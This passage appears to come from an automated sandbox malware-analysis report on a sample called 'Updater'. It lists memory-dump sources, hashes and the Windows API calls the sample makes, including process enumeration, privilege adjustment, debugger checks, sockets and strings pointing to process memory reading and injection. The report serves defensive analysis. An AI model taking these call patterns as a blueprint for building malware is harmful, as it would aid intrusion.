                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 7462febd9d6795ca285236fbe115a735b71a735a4483d8e10eb56df8b3987c02
                                                                                                  • Instruction ID: da05edfb7c4267df5f37df21e0ac201b4e115ff353fb831f8cae9ac75573b986
                                                                                                  • Opcode Fuzzy Hash: 7462febd9d6795ca285236fbe115a735b71a735a4483d8e10eb56df8b3987c02
                                                                                                  • Instruction Fuzzy Hash: E9C22971E08628CBDB25CE28DD447EAB7F5EB44314F1446EAD84DE7281E779AE818F40
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
                                                                                                  • API String ID: 0-74115134
                                                                                                  • Opcode ID: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
                                                                                                  • Instruction ID: f1aa1d1fd59f936134c13a5387d81a0c6af310eaabffa986adeaa65f253a0383
                                                                                                  • Opcode Fuzzy Hash: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
                                                                                                  • Instruction Fuzzy Hash: 82221470E04299DFDB11CBA8C884B9EBBF5AF19314F184099E588EB352C375AE44CF65
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
                                                                                                  • API String ID: 0-74115134
                                                                                                  • Opcode ID: f009389dbf6bdb488227933d29eee8e8557a806c60bfa5e10011c3ddaf01dae6
                                                                                                  • Instruction ID: 429d02ae614ea88fb77ea299b105afb82ca85ace57aae0641b615a9b880ae34c
                                                                                                  • Opcode Fuzzy Hash: f009389dbf6bdb488227933d29eee8e8557a806c60bfa5e10011c3ddaf01dae6
                                                                                                  • Instruction Fuzzy Hash: A4022A70E04298DFEB11CBACC885B9EBBF5AF19304F184099E588AB352C3759E54CF65
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00752E97
                                                                                                    • Part of subcall function 0074F035: GetWindowRect.USER32(?,?), ref: 0074F04D
                                                                                                  • GetDesktopWindow.USER32 ref: 00752EC1
                                                                                                  • GetWindowRect.USER32(00000000), ref: 00752EC8
                                                                                                  • mouse_event.USER32(00008001,?,?,?,?), ref: 00752EFA
                                                                                                    • Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D
                                                                                                  • GetCursorPos.USER32(?), ref: 00752F26
                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00752F84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4137160315-0
                                                                                                  • Opcode ID: 97d49b9ca8980387fa297602cfad338cfe4a813a003b09fb4d67f53008057d5e
                                                                                                  • Instruction ID: 1f30c84b329970eeea8bf7290c9892b1c17f374a9f2a9f764bb12beae1bfe72f
                                                                                                  • Opcode Fuzzy Hash: 97d49b9ca8980387fa297602cfad338cfe4a813a003b09fb4d67f53008057d5e
                                                                                                  • Instruction Fuzzy Hash: 0031F6326053069BD720DF14D849E9BB7EAFF89344F000519F88997192C774ED09CB96
                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007380BE
                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007380F4
                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00738105
                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00738187
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                  • String ID: DllGetClassObject
                                                                                                  • API String ID: 753597075-1075368562
                                                                                                  • Opcode ID: 7e3530eec8f3c88e63969c82579df66016b68e518215fc29579b24fd22959d68
                                                                                                  • Instruction ID: ecb4a6661952b32691c730395cab92f4f48e3148521681a7832e9b9ddea4f488
                                                                                                  • Opcode Fuzzy Hash: 7e3530eec8f3c88e63969c82579df66016b68e518215fc29579b24fd22959d68
                                                                                                  • Instruction Fuzzy Hash: 5D417CB1600308EFEB55CF54C884A9A7BB9EF44710F1481ADF9099F206DBB9DD41DBA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0074A6BB
                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0074A6EB
                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0074A7B8
                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0074A7CE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                  • String ID: *.*
                                                                                                  • API String ID: 2693929171-438819550
                                                                                                  • Opcode ID: 7f3b6dfb98f2ff275ac0a7b064c0f546f90be3f8ecc16ea90b30ce7e533604a7
                                                                                                  • Instruction ID: 65a4c9b48cf48cc78f0a92a5b97ee48527fd10e396f0dbc0ffa85ca1e5c85319
                                                                                                  • Opcode Fuzzy Hash: 7f3b6dfb98f2ff275ac0a7b064c0f546f90be3f8ecc16ea90b30ce7e533604a7
                                                                                                  • Instruction Fuzzy Hash: DC417271D4020EAFCF65DF64C849AEEBBB5EF05310F14406AE815A2291DB349E44CF55
                                                                                                  APIs
                                                                                                    • Part of subcall function 00753B94: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00753BC5
                                                                                                    • Part of subcall function 00753B94: _wcslen.LIBCMT ref: 00753BE4
                                                                                                    • Part of subcall function 00753B94: htons.WSOCK32(00000000,?,?,00000000), ref: 00753C2D
                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00752437
                                                                                                  • WSAGetLastError.WSOCK32 ref: 0075245E
                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 007524B5
                                                                                                  • WSAGetLastError.WSOCK32 ref: 007524C0
                                                                                                  • closesocket.WSOCK32(00000000), ref: 007524EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_wcslenbindclosesockethtonsinet_addrsocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 1501050944-0
                                                                                                  • Opcode ID: b2a3168a329ae533a258acb8c903b5f7735c21ef7f337a7a48976522a330ef36
                                                                                                  • Instruction ID: d3047a9f7e0d3bfca718dfdc630b65a034fdfa401f66e8db802cb971ea280d05
                                                                                                  • Opcode Fuzzy Hash: b2a3168a329ae533a258acb8c903b5f7735c21ef7f337a7a48976522a330ef36
                                                                                                  • Instruction Fuzzy Hash: 1351E271A00210AFD760AF24C896F6ABBA5AB45714F14C09DFD055F383CBB5AD42C7A1
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0073E2D0
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0073E2DE
                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0073E2FE
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 0073E376
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0073E3BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 2000298826-0
                                                                                                  • Opcode ID: cb9e69cb1b537a96b2b48571d092b3b101952b84a32747345935922906838ef3
                                                                                                  • Instruction ID: 83e54f67c95505c92a81ee3633aa55653db616e89107cc5d90ce08be92b0cdbd
                                                                                                  • Opcode Fuzzy Hash: cb9e69cb1b537a96b2b48571d092b3b101952b84a32747345935922906838ef3
                                                                                                  • Instruction Fuzzy Hash: 4D318F715083019FD314DFA0C885BAFBBE9AF89340F44092DF586872E1EBB59945CB92
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                  • String ID:
                                                                                                  • API String ID: 292994002-0
                                                                                                  • Opcode ID: 1beb10ee373d017aa27778903ba0e16120bbf81dc7e0a48c9bb7833363430422
                                                                                                  • Instruction ID: 536621379003720e0a226bdec64729eba907c2639a51f6eb0dd57b07dd359b94
                                                                                                  • Opcode Fuzzy Hash: 1beb10ee373d017aa27778903ba0e16120bbf81dc7e0a48c9bb7833363430422
                                                                                                  • Instruction Fuzzy Hash: 6521F331B00A119FD7718F16C854B167B94AF44358F148099E80B8BA53CBB9ED43CBA1
                                                                                                  APIs
                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007320D4
                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007320E0
                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007320EF
                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007320F6
                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0073210C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 44706859-0
                                                                                                  • Opcode ID: 83964eae21f12944b9e3b4409c02a370a473492313340428a95883ffa81292c3
                                                                                                  • Instruction ID: d4567c6743d9ee7e48e33cc6122c84694b5e25e8462376c3116a92c422cbf68b
                                                                                                  • Opcode Fuzzy Hash: 83964eae21f12944b9e3b4409c02a370a473492313340428a95883ffa81292c3
                                                                                                  • Instruction Fuzzy Hash: 59F06275710305BBDB210FA5DC4EF563B6DEF89760F114414FA46D7252CAB9EC018A60
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0073917A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen
                                                                                                  • String ID: ($|$py
                                                                                                  • API String ID: 1659193697-823948841
                                                                                                  • Opcode ID: 78bdde17aab7e64e575f36a8e403ccf97deeda3f475952de7f92e31a2e113696
                                                                                                  • Instruction ID: 45e170ad9dc9cfb9528820a292e18d417d1fcba557f149b1750251cce7813d46
                                                                                                  • Opcode Fuzzy Hash: 78bdde17aab7e64e575f36a8e403ccf97deeda3f475952de7f92e31a2e113696
                                                                                                  • Instruction Fuzzy Hash: AE322475A00A05DFDB28CF59C081A6AB7F0FF48310B11C46EE59ADB3A2E7B4E941CB44
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00746897
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 007468ED
                                                                                                  • FindClose.KERNEL32(?), ref: 00746935
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3541575487-0
                                                                                                  • Opcode ID: 336870beda50f4215460c49f1690fc48b8aa8737bc762760d888ba10b181d20a
                                                                                                  • Instruction ID: d232b0d9ac379b61facccfd9f78b157e88fd7c2f4ff9267a302a5c9757281e5c
                                                                                                  • Opcode Fuzzy Hash: 336870beda50f4215460c49f1690fc48b8aa8737bc762760d888ba10b181d20a
                                                                                                  • Instruction Fuzzy Hash: 3D519874A046019FD714DF28C490EAAB7E4FF4A320F14415EE56A8B3A2DB74FD05CB92
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000004), ref: 0070253E
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000004), ref: 00702548
                                                                                                  • UnhandledExceptionFilter.KERNEL32(006D1221,?,?,?,?,?,00000004), ref: 00702555
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: f34714bf299859c11fbf45bb4be6f90ba0dc1587106c8577334e71024a3ff05b
                                                                                                  • Instruction ID: 2e42f72b1c76135731981e4d0b899724eec975bb37e6f4feda70977846fcdf40
                                                                                                  • Opcode Fuzzy Hash: f34714bf299859c11fbf45bb4be6f90ba0dc1587106c8577334e71024a3ff05b
                                                                                                  • Instruction Fuzzy Hash: A631C47591122CABCB61DF24DC8879DBBB8AF08310F5042DAE91CA7291E7749F858F49
                                                                                                  APIs
                                                                                                    • Part of subcall function 006F042B: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0C74
                                                                                                    • Part of subcall function 006F042B: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0C91
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00732823
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00732850
                                                                                                  • GetLastError.KERNEL32 ref: 00732860
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 577356006-0
                                                                                                  • Opcode ID: 539536c51b8008e14a8edfec48c6cdbd0688acb818fecc8340a30f59cd0fc05e
                                                                                                  • Instruction ID: 465d4d162b31f3be67c5c094a4d4faf58ad07dca5e75d95d1deda676e745464c
                                                                                                  • Opcode Fuzzy Hash: 539536c51b8008e14a8edfec48c6cdbd0688acb818fecc8340a30f59cd0fc05e
                                                                                                  • Instruction Fuzzy Hash: DE11B2B1914309EFE7289F54EC86D6AB7F9EB04710F20812EF54653242EB74BC418A64
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073E3E8
                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0073E429
                                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073E434
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 33631002-0
                                                                                                  • Opcode ID: d0f2e368605399fd20f329278466c8be3fdceba1c3f2c747ed3bd392cd9fe99a
                                                                                                  • Instruction ID: abb5dc34000032dd967b44b544232d7b9ae24c512eb44ada3da74acbf68f7124
                                                                                                  • Opcode Fuzzy Hash: d0f2e368605399fd20f329278466c8be3fdceba1c3f2c747ed3bd392cd9fe99a
                                                                                                  • Instruction Fuzzy Hash: A4117071E01328BFEB208F959C44BAFBBBCEB49B60F108151F904E7280C6744E058BA1
                                                                                                  APIs
                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007327A0
                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007327B5
                                                                                                  • FreeSid.ADVAPI32(?), ref: 007327C5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 3429775523-0
                                                                                                  • Opcode ID: 767635229e1f5f3e4d047962f39a708a7c2dad829d0b35ca3c0dbc987d129ef2
                                                                                                  • Instruction ID: 645e5d6ad08c004faa1351b8567858b1ca66d5461aa690fc8998cfb37718d755
                                                                                                  • Opcode Fuzzy Hash: 767635229e1f5f3e4d047962f39a708a7c2dad829d0b35ca3c0dbc987d129ef2
                                                                                                  • Instruction Fuzzy Hash: A1F06D71E6030CBBDB00CFE0DD89AADBBBCFB04200F0044A5E901E2181E778AA04CB54
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNEL32(?,00726A2B), ref: 0073E9CA
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0073E9DB
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0073E9EB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                  • String ID:
